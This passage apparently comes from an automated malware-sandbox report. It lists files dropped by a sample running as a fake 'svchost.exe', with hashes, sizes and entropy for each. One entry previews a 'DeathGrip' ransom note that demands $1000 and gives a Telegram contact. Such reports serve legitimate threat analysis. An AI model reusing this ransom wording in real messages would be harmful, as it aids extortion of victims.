                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.7586857076207565
                                                          Encrypted:false
                                                          SSDEEP:24:F+Aq1rmkDqze+4zscKHS90CQVMJuip9PpqBKR5p69xlutFyzR2gjSCGg3fl/9xr2:1kDYe+PcKyWnS2BKP+xlu3Q2wUIfl/94
                                                          MD5:98924F48407965D6EA470089930C846F
                                                          SHA1:3D1804224361CA0BE704DB311E7A1F77CDB138D5
                                                          SHA-256:4E43291C6CE1D8D461689D10970B89E5CB481F5D2E6DBAA8BD3F2B612B0118E3
                                                          SHA-512:3F741AC2F7B8AEB630D406DAB25D521167A87A92486A4C80CCBF8CBEDB8A9785D03A1C8AEB6B6B90FD53B3378ACD05D58F34DABEEFD40E9E9D9B1E6BC02F93E0
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\4wx72yFLka.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.72355410638425
                                                          Encrypted:false
                                                          SSDEEP:24:PHkwVD95O9LEbC47XR3luUMbP0m/TAPtXzPgvrw0dPUbC8Xl84vlP:vkm5XbTR3nIPJitjPUJY9xvlP
                                                          MD5:DD073E733B6AE41EDA5F076F238E938E
                                                          SHA1:080610AE99A87C60378FA8741C01CEBC359B6523
                                                          SHA-256:7000D04608DBE4380EDEEB01E0C3F165ED5E889BC49729761CB7EEF3B17BAAD3
                                                          SHA-512:EBA6377D77E86B0FFC12752F873B4F80BF749135B1BF98B80F8D3EECAD1B2E453F1C37DC90762C41E94BD2B6092928C26CEF8DD1314F3B9676F8D6DD8D6D45A8
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.750470392169932
                                                          Encrypted:false
                                                          SSDEEP:24:Ha+gtdlnfnLO2MnVSRLhkF7k1PGWcisJ0sIDg26EpZrg6qGlJY:R2lnfnLOCchkhGWc6bPrkGnY
                                                          MD5:76D1AA3C3DEADD677770097DFE0CBA65
                                                          SHA1:DAD32079B53BF513A2026ECA737C5B5457C285CE
                                                          SHA-256:67325C96B2C5BE69A3A4B168FDB77FD65235EBA7FA852D3CBA05C7EBA47964E2
                                                          SHA-512:DF4516C5A1305048367DEF768483B93B8E448B27964D7F1DD56817439EF369028C8C72916002054BEFAEF9D14160CB3A5410A8EB216063087B2F54678C694B64
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.776805131058611
                                                          Encrypted:false
                                                          SSDEEP:24:Zo6wvSG3LO6+wSJaZhLqNR9ym9cON+X0m/q/w8qfbHdLkKf:Dab6taYr7cOgCufbHv
                                                          MD5:F37EB0F65195A2DD648CB7CBD6D708E1
                                                          SHA1:256166A88646911FA5E6EAE96CBCB0DDD0507A2F
                                                          SHA-256:602334B1BEAE1CC4E3D795A24E450BFC0C1F3E74F12D28E7A923170012CDA820
                                                          SHA-512:ED9C8DA87545D12D1E52496E36F9FE82E0483383BE56CFCAD085C020EF7FC0A66D0EDF18200E320F13C5EB17A15C134C02A0903AF452F7DECFDF4AD629482744
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.746460310958782
                                                          Encrypted:false
                                                          SSDEEP:24:WaLIpBf2pJkmB86KjiP7qdsRMcWEbABCADwRwBdy7UV+R7U2sakM1ZCSnGRen:WaLIpMDku3KGTqORfA+wBcUFdoJGRen
                                                          MD5:51F89A6FFFF79F35A11D33AE8A2DEC63
                                                          SHA1:87B55EEB947B464C6978AC6C8D36895CFB5971B5
                                                          SHA-256:BA0D4C7D971D6FE1DB6551AAD9FBA83245829329EBADABB5A94CD3B92B27D76E
                                                          SHA-512:ADC2E1BECFB0F0D41689C03EA4BCC0C0E9B8EF3E053547FF1886FE7E48728F0676D5F289F993246067E9DAAB558F34807E2E5F8459F283B5EB73336F4F258CB6
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.7457562820513575
                                                          Encrypted:false
                                                          SSDEEP:24:+AfbQXYx4BE4oUlRQnX+dcVkekWKCnyzq8TYcyzxBR8hyBPwZbeNsv4eslG:f2Zy4omRQX+dtWnn6q8FyzlBP42o8lG
                                                          MD5:90CCCB91B8C1C0BCFD5C6BE472B7A7E8
                                                          SHA1:E86E85F57FEFD836A8C69B14FC6EB2045AE61180
                                                          SHA-256:56B631F5350398A49851075DA400C308C9E6EB5A62FFC574E56757BA7E1CAA08
                                                          SHA-512:03865BCFE7C9B64876EFD6FA2254645BE4087F8240789F48C77266FC43CA5055853E33AD8C10C818928A5D920350E2F4A8B7C891CF8514F6F1A098FB607DE37B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.750741327469132
                                                          Encrypted:false
                                                          SSDEEP:24:b7hWRofaIow24yvr4QFdkpPkwn0gXkPrBsjD81iY5Th4SbtvUVXJmYBV6TG5UMJW:b46fav+nQGFY8SbtvUVJncR
                                                          MD5:D822807DB6FF103698050A5C91DAF0A0
                                                          SHA1:B93194689C1C0CA4E453AFCE5CF943E84E2B93E0
                                                          SHA-256:EFE7CE63AAC7D9E730F9C9FCF8C83EDC85A566927929A01927484921825F18C7
                                                          SHA-512:56C42CAF04189FE5C15C099BC3FDCAFCE1FE2D0F41FEA0E339B1D6E6DAA8E1DFBB15E34B889C9FF871771889B5129C70FDD709B33E6214B4A846B9768818DDD0
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.741230055912095
                                                          Encrypted:false
                                                          SSDEEP:24:q4mH48eWCQ84pmnWnH/hMR5pF/NsV3/fHE95c33cwcJ4gYEV49Hyo3iGWdu0/Q1Y:IpeWTb6Q/hM/X/NW/P5c/NYEV49H73iZ
                                                          MD5:BD6F4D8D36832B62B0343955FD48F97B
                                                          SHA1:1A3DDB183C815E33C1885B62827AF6C30462A3A7
                                                          SHA-256:01AAD1F231FC0F4920DAF91B5327EC4C07F918DB58891215D471FA2FF79E199E
                                                          SHA-512:E0CAE657601960E5B406D8BD7915F20CF0A4B66C1DE6F62BB81D005E6392F561D15E440DCA02108DC7B5CCEE93CF85CBF4DA1CFB47FAE673CD4DABD05504C3EF
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.752276794133184
                                                          Encrypted:false
                                                          SSDEEP:24:WelQ4Kkd++IWgK6CyQ4nMSvTbcjaz5kvD4m5gyzbwd/Dq5e3XbuwChnl3SGh1K4+:nlYkdTIWoQtcTd9yDhil/DrQlCq+
                                                          MD5:5EE1ECC2ED5760D790DFB4EE6EAAD8ED
                                                          SHA1:D14DD5B56B1258DB3DF478AE810E57BBFCAC92E7
                                                          SHA-256:5F20B18506DD949691533E9D2C45C6C191814D0E86820EB4879E6EFB34D70570
                                                          SHA-512:F1CB44D7E495899B8B798EC6B1FBB0A4771A1B5E1C65AD1C218195025DF426588D91BE953B45C3A766A5E95B12BCDBFFE460A6F4AAF5C7DE8C520CAFE77134E9
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.733985600240128
                                                          Encrypted:false
                                                          SSDEEP:24:6CVTi1IjQiUTsMZTzDCBZoUtYjxh9hpjdyn7B1el3Kp/mBot1mFr29YiiY:g1Ps6+XoUqjjpsF13Zht1WudiY
                                                          MD5:3EDA8C8D7CBBAF84DE6CF05E0876705C
                                                          SHA1:591222330C6D1E860F7D8387368CC86212D9B017
                                                          SHA-256:CA1E3056D96180FAB274443C7E9534746304A1812708B01BAE0689C439C701ED
                                                          SHA-512:2448ECE0AF82F6D14DDB18DBB3A59CC0FFF919962B5DC42A0986848F1636482EC7561300B4D82E955AAA5906544DA8D238791BCDD9F55CCCCE241C65FD66F285
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.7458323837797565
                                                          Encrypted:false
                                                          SSDEEP:24:JS0CrxvRob4YnidBCEX5m/+4oFcrFl6BL6GlsUv3pScJk7o1UbEuBGF6PSqbRFXi:KrNRCJidOXoF8oB7vIcJkoU4qSqNFp/c
                                                          MD5:EC09B3C8AF7E20F4D102DD4FC2E28B1B
                                                          SHA1:769BDD45DB89F15E7AD65D4DD08498AE8A4D1F5F
                                                          SHA-256:F3E87E9DF01794C1E55F3512B2994AAE48E1BE7EECA304335F04735FECDD72BE
                                                          SHA-512:92140CCD62760208D174166546BB07B97B5E26C8DBB351A62B6855D93B2448438FDFB56D23044E7FF7D75BAC4D520DBAACFDC9552DDC85BB37BD668681D55504
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):848
                                                          Entropy (8bit):7.472605236431139
                                                          Encrypted:false
                                                          SSDEEP:24:EHph3lKP9Fur1YDPc8UqHgXLHxil4+vNa:spBlKP9o5YD/HYLHxillvNa
                                                          MD5:E73CFF335B48E105EDB5EBCDBD4A793E
                                                          SHA1:209A5A0B1211A01BF155AC949333DA0A8D04A743
                                                          SHA-256:0F5CBF28E7CBC92BFF8F3A254CC488C87806150379E253DC4E5A3747951BB011
                                                          SHA-512:DF29044F5B08794F2147F4BA957A11E9CEA9AC22860F4B185BFE8ADBCD7A4DF74B0A62772AF4D5FC731BD2E97A252880E44B0A0C7805EE93CD27E34322442029
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):768
                                                          Entropy (8bit):7.344643263971878
                                                          Encrypted:false
                                                          SSDEEP:12:7xCf44EKQJ1Kb1wX69Lk3AXpuqyZSON69hWoeQGmSuHkxW3pbBPagS1:5DJ0wqC30w7Ez9wPQcuH2W3pdCb1
                                                          MD5:FA2B505F8A46C0CC541F22DD97A43E8C
                                                          SHA1:1276D94C2E6A6546505DF54D9F1023D662475082
                                                          SHA-256:9A753216BE5A16EA2EFB161D8BDDF8941BDF7A63D528F2E4C6ABB57E72C3BCF0
                                                          SHA-512:CF408A0D40B968E9A6D7BE1A61C2D63714EDBFE523C8475F18EECA7E9BAD7E13E9755D4433FAED9629B6EED9B6F15D2D402E8668B161AC0BC6AE0FEF5E2C0B03
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):49312
                                                          Entropy (8bit):7.996307231673809
                                                          Encrypted:true
                                                          SSDEEP:1536:OTAKUMC0cFQbeepjYPgBjTrr9fUE2RRdspfifzleoHu:Y+mHbeepjYPgBjTdGPQifO
                                                          MD5:13F6F525BD1CBA79F3A6CB7FC988DA28
                                                          SHA1:9CDBB062F280D6E2614BE852404506987885A6C1
                                                          SHA-256:91F791C51CA65AB0FFB9F83A8C27CE8B1F125FDB87552656D75AA488CA6D1C86
                                                          SHA-512:4128018A8F58E42D18D82C0DEE825C46C596CDF7386D787D90F89CDB021A7A7F8C3794A55EFA6CF72D604ED1BA6E4B497F403DC0FD1C6ED08F2A990C231C500B
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11616
                                                          Entropy (8bit):7.983218804361249
                                                          Encrypted:false
                                                          SSDEEP:192:HQh8hEkReDSxYDHssxcf6LyBtv+lT3BNQ8XDL8UErc9vAoKXWsefdLzgec4mQjf9:wGDR0LDJHLyHM3E8XDLLkcKJGlXgISeR
                                                          MD5:B61952991B3A496C770819280D947D87
                                                          SHA1:57974887550D7CFA7BBBCC4338701AFE758D2618
                                                          SHA-256:B59C1B5BBBDE549336F6003B608F3BC74F946FA87B8E738DBAC8B02F017E27F1
                                                          SHA-512:0D241D6E4F707C997E4A4E4B2CCCCBD40F77F86C44739D84107318C7B009B2C2A75C32DFC3BAF0A1884411DE3947BEA8A920425D27E941700628B0C57FD64D1D
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):400
                                                          Entropy (8bit):6.357762592622856
                                                          Encrypted:false
                                                          SSDEEP:6:tn+j2LOG+ZkEgD58AU0JLxje+iKGl0UHQwuOf59EatIArvsHG1sOgydml4aI6n:tn+CLOJKEgFUA1KtKGuUHJ59EGI+wul6
                                                          MD5:2C06FBE48FC3DD5871F39B5D28B71875
                                                          SHA1:DE097865811D5FAA578EA52A69B3B01AA6618558
                                                          SHA-256:9A85BC7DE6C5DBF3B89034361C20ABC388AE81AE3547D9C8390C381EE68AD0B8
                                                          SHA-512:BAB77153D40AB416026C8183490126C7EBD32FF81FBC54682E2DE7E5E0406166F4DA8476CB7E96D6835BDFDF41B182CF2152EA94ED911364284ECC4C1D9B6872
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):880
                                                          Entropy (8bit):7.5058595999347295
                                                          Encrypted:false
                                                          SSDEEP:24:yAubM1HH+ntpN67opI5/trEu+xFxUJdEnKdr3IIIea1:yANdwy5pg6JdTN4Jb
                                                          MD5:FEFCA8CBE8C6F68D1681D58A95EA6F13
                                                          SHA1:03D9CB386072B16E058B84A506BBA480DA9885C7
                                                          SHA-256:4243AF384C4197481A95907DB17B6CDB3CE51FFBF25BD138DBF99F83FB0F75DD
                                                          SHA-512:4EF5F49A50863C0DA0FEEFE3C735E656448F96B6DC41A995CB301CC01591465E332AC0069D7032AEBF86B53F4209D9993DD5F971567759C03A55CA09B5EA9086
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):400
                                                          Entropy (8bit):6.340516003804926
                                                          Encrypted:false
                                                          SSDEEP:12:u4+MDUiRZXlemKSJVhsSshWSUatuE9MMO/ckLRWdEYIynHh:uwDUiRveSJQftUatuuM3RLg0i
                                                          MD5:1ED7BC2B5BE0257AE1A2988AF565C44D
                                                          SHA1:9EA6EF36268ACD16D1DF7A2C51DE0CD6DDB5EDDF
                                                          SHA-256:0BC067232ADA25E067BB546099BC319E296CBA9DCF18C56BC00F0FBC80475E88
                                                          SHA-512:BC074B047029E1FA79B7D442DBFBE4CD07F670D243447DB142CB01E523B1079BFDCEE7D946C6A6A41BA46D2991F04E7411991B4C88859255A732CBB264256C4D
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.076333348243556
                                                          Encrypted:false
                                                          SSDEEP:6:yr1mcN/cc9BrmcJid9C5z/ZhEhPo3+UtfDwxhs8tfKL8iQgPoL9pEpaT3UqxC1iT:yrPN1BycJ0yhEhPo36xhsqfILQgPSpSa
                                                          MD5:8CF823B7CAC940468C3C3DDAB7BB35CF
                                                          SHA1:0020CAC368384E43743E499593BD6181DA857EEE
                                                          SHA-256:DF4364FFAB73F5DDD6AE03FAA405C611F530ED6EC4D54D8D69328798FB21E7EA
                                                          SHA-512:AB99276C09F78175CCF37325E2E86801FC00DD267E21D9475A58B6103884DFE7AED5CF161F5322154A748CABF4BEC6AB0B3299F585CBE3A7893F3286C3CA2BD6
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):416
                                                          Entropy (8bit):6.421967076053681
                                                          Encrypted:false
                                                          SSDEEP:6:EfWTXph8pDnJTn7dJ+gutCNmcRzRY+wD0lY8TViaFIyqSJQYWvz0KMTV3PUzw:8JTnJBBNmEYPV8TwaFIJSXWv7Vzw
                                                          MD5:BDFE05D486352DA4200704D5BCE2AA01
                                                          SHA1:B80F35A816808B116BD1C9A092DE6FFFC40FBA31
                                                          SHA-256:7099BC7EA1D33E095C3A9A358B999922ED3F7C5F815896C440AF2DBA58DDBA54
                                                          SHA-512:9E9B544A15F3A7ED0D32547625F1883A4EB85D720A1FE6A5F80FFE21CAD0256C5E0C253AB1D3DE91D800E05D8B0B1F1FCF60B11349531543B2AD8DB9A25EFD0A
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
